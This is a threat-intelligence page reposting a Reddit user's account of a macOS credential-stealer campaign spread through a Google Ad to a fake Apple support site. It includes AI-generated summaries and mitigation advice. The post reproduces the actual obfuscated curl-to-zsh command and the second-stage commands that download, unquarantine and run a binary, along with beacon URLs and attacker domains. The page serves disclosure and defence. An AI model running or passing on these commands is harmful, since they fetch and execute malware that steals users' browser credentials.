Not a security person... got hit by an undocumented macOS stealer campaign, reverse engineered it, and tried to take the whole operation down.
A macOS stealer malware campaign was discovered by a non-security professional who was tricked into running a malicious terminal command from a fake Apple support website delivered via a Google Ad. The attack involved downloading and executing obfuscated scripts that ultimately attempted to run a binary designed to steal browser credentials. The attack was halted when the victim denied Finder access permissions. The campaign uses multiple domains for phishing, tracking, and payload delivery, with infrastructure registered very recently. No sample of the final binary was obtained, and the campaign is currently undocumented elsewhere.
AI Analysis
Technical Summary
This threat involves a macOS credential-stealing malware campaign initiated through a malicious terminal command obtained from a Google Ad linking to a phishing site mimicking Apple's support page. The command downloads and executes obfuscated scripts that decode and run a hidden payload entirely in memory, avoiding disk writes. The payload attempts to download a helper binary from cedar-satin.com, which is intended to steal browser credentials. The campaign includes a tracking beacon to monitor victims. The attack was stopped by denying Finder access permissions, preventing execution of the final binary. The infrastructure is newly registered and uses multiple domains for phishing, tracking, and payload hosting.
Potential Impact
If successfully executed, the malware could steal browser credentials from infected macOS systems. The campaign uses social engineering via a fake Apple support site and a malicious terminal command to deliver the payload. Execution of the final binary is required for credential theft, which was prevented in the observed case by denying Finder access. The campaign is active and uses paid Google Ads for distribution, indicating targeted delivery to macOS users searching for disk cleanup solutions.
Mitigation Recommendations
Denying permission requests such as Finder access can prevent execution of the final payload, as observed in this case. Users should avoid running terminal commands from untrusted sources, especially those obtained via ads or suspicious websites. Since no official vendor advisory or patch exists, users should rely on cautious behavior and endpoint protection solutions to detect and block such scripts and binaries. Monitoring for suspicious network connections to the identified domains (clearspark28.com, amber-22.com, cedar-satin.com) may help detect infection attempts.
Not a security person... got hit by an undocumented macOS stealer campaign, reverse engineered it, and tried to take the whole operation down.
Description
A macOS stealer malware campaign was discovered by a non-security professional who was tricked into running a malicious terminal command from a fake Apple support website delivered via a Google Ad. The attack involved downloading and executing obfuscated scripts that ultimately attempted to run a binary designed to steal browser credentials. The attack was halted when the victim denied Finder access permissions. The campaign uses multiple domains for phishing, tracking, and payload delivery, with infrastructure registered very recently. No sample of the final binary was obtained, and the campaign is currently undocumented elsewhere.
Reddit Discussion
DISCLAIMER: I'm a biochem student with no cybersecurity background. Tonight I got tricked into running a malicious terminal command I found via a Google Ad. I spent the next 3 hours with Claude AI trying to figure out exactly what happened. Posting because nobody has documented this campaign yet, this is also my first post on this subreddit so I apologize beforehand... Code samples are posted for research purposes only. Do not execute anything in this post.
First!
My disk space was low on my mac so I search on Google "low disk space mac". Clicked the first thing and it was actually a Google Ad that led to clearspark28.com which was a pixel-perfect clone of Apple's support website, fake Apple copyright footer and all. It told me to paste a command into Terminal to "clean up disk space." I pasted it. The moment I hit enter I knew something was wrong (too good to be true). I know, in hindsight that was so damn obvious but I was distracted during that time...
THE COMMAND:
echo "Downloading Update: https://support.apple.com/storage/cleanup-2.3.15" && curl -s $(echo "aHR0cHM6Ly9jZWRhci1zYXRpbi5jb20vY3VybC8xZmFjMThmNDc2MjIzNGE0M2Y2NWFkNWMyNzQxOWM3MzdlZDBlYWYxNDA4Yzg3NTRkMjhiMWUwMzI5NDg4NmNi" | openssl base64 -d -A) | zsh
The fake Apple URL is just text printed to the screen.
The real URL is base64 encoded and hidden, it points to cedar-satin.com.
macOS showed a permission prompt asking for Finder access. I denied it. I think that stopped the attack.
Downloading the script without executing it revealed:
- Mostly junk padding (fake variables, meaningless loops)
- A gzip compressed, base64 encoded hidden payload
- Everything executed via eval so it never touches disk
Decompressing the payload revealed octal encoded strings hiding all the real commands.
Tracking beacon (fires immediately on execution): https://amber-22.com/api/metrics/run?event=pasted
With headers:
user: AxkPZnSWtzN7LfXvNn7o_H6WDDJ-oCP5b2gqZVITruE
BuildID: a5m2yvGoDVLVNY7hEYjAz0Dksst8zgbvil3Vx-s3rQs
Second stage download and execution: curl -o /tmp/helper https://cedar-satin.com/[path]/cleaner3/update
&& xattr -c /tmp/helper
&& chmod +x /tmp/helper
&& /tmp/helper
The binary was intended to steal browser credentials. It never executed because Finder access was denied.
clearspark28.com: fake Apple phishing page (Host: FEMOIT, GB (abuse@as214351.com))
amber-22.com: victim tracking beacon (Host: Limited Network LTD, Romania (abuse@btcloud.ro))
cedar-satin.com: malware payload server
cedar-satin.com was registered: May 24, 2026
Attack observed: May 26, 2026
Registrant: Maxwell Nguyen
Address: 62 W 7th Street Apt 56, Fort Worth TX 76102 (Almost certainly fake) Nameservers: Cloudflare
The initial attack vector was a paid Google Ad (Campaign ID: 23886301396).
This means someone paid Google with a real payment method to target people searching for Mac storage help.
WHAT I COULDN'T GET:
The actual /tmp/helper binary, it was never written to disk on my machine so I have no sample to analyze. If anyone recognizes this infrastructure, the beacon headers, or the cleaner3/update path, please comment. I'd love to know what the binary actually does and who is behind this. Happy to answer any questions or provide additional details!
AI-Powered Analysis
Machine-generated threat intelligence
Technical Analysis
This threat involves a macOS credential-stealing malware campaign initiated through a malicious terminal command obtained from a Google Ad linking to a phishing site mimicking Apple's support page. The command downloads and executes obfuscated scripts that decode and run a hidden payload entirely in memory, avoiding disk writes. The payload attempts to download a helper binary from cedar-satin.com, which is intended to steal browser credentials. The campaign includes a tracking beacon to monitor victims. The attack was stopped by denying Finder access permissions, preventing execution of the final binary. The infrastructure is newly registered and uses multiple domains for phishing, tracking, and payload hosting.
Potential Impact
If successfully executed, the malware could steal browser credentials from infected macOS systems. The campaign uses social engineering via a fake Apple support site and a malicious terminal command to deliver the payload. Execution of the final binary is required for credential theft, which was prevented in the observed case by denying Finder access. The campaign is active and uses paid Google Ads for distribution, indicating targeted delivery to macOS users searching for disk cleanup solutions.
Mitigation Recommendations
Denying permission requests such as Finder access can prevent execution of the final payload, as observed in this case. Users should avoid running terminal commands from untrusted sources, especially those obtained via ads or suspicious websites. Since no official vendor advisory or patch exists, users should rely on cautious behavior and endpoint protection solutions to detect and block such scripts and binaries. Monitoring for suspicious network connections to the identified domains (clearspark28.com, amber-22.com, cedar-satin.com) may help detect infection attempts.
Technical Details
- Source Type
- Subreddit
- Malware
- Reddit Score
- 0
- Discussion Level
- minimal
- Content Source
- reddit_link_post
- Post Type
- link
- Domain
- null
- Newsworthiness Assessment
- {"score":30,"reasons":["external_link","newsworthy_keywords:campaign","established_author","very_recent"],"isNewsworthy":true,"foundNewsworthy":["campaign"],"foundNonNewsworthy":[]}
- Has External Source
- true
- Trusted Domain
- false
Threat ID: 6a15d914891d628fdc63fb7e
Added to database: 5/26/2026, 5:32:04 PM
Last enriched: 5/26/2026, 5:32:54 PM
Last updated: 5/26/2026, 8:57:35 PM
Views: 13
Community Reviews
0 reviewsCrowdsource mitigation strategies, share intel context, and vote on the most helpful responses. Sign in to add your voice and help keep defenders ahead.
Want to contribute mitigation steps or threat intel context? Sign in or create an account to join the community discussion.
Actions
Updates to AI analysis require Pro Console access. Upgrade inside Console → Billing.
External Links
Need more coverage?
Upgrade to Pro Console for AI refresh and higher limits.
For incident response and remediation, OffSeq services can help resolve threats faster.
Latest Threats
Check if your credentials are on the dark web
Instant breach scanning across billions of leaked records. Free tier available.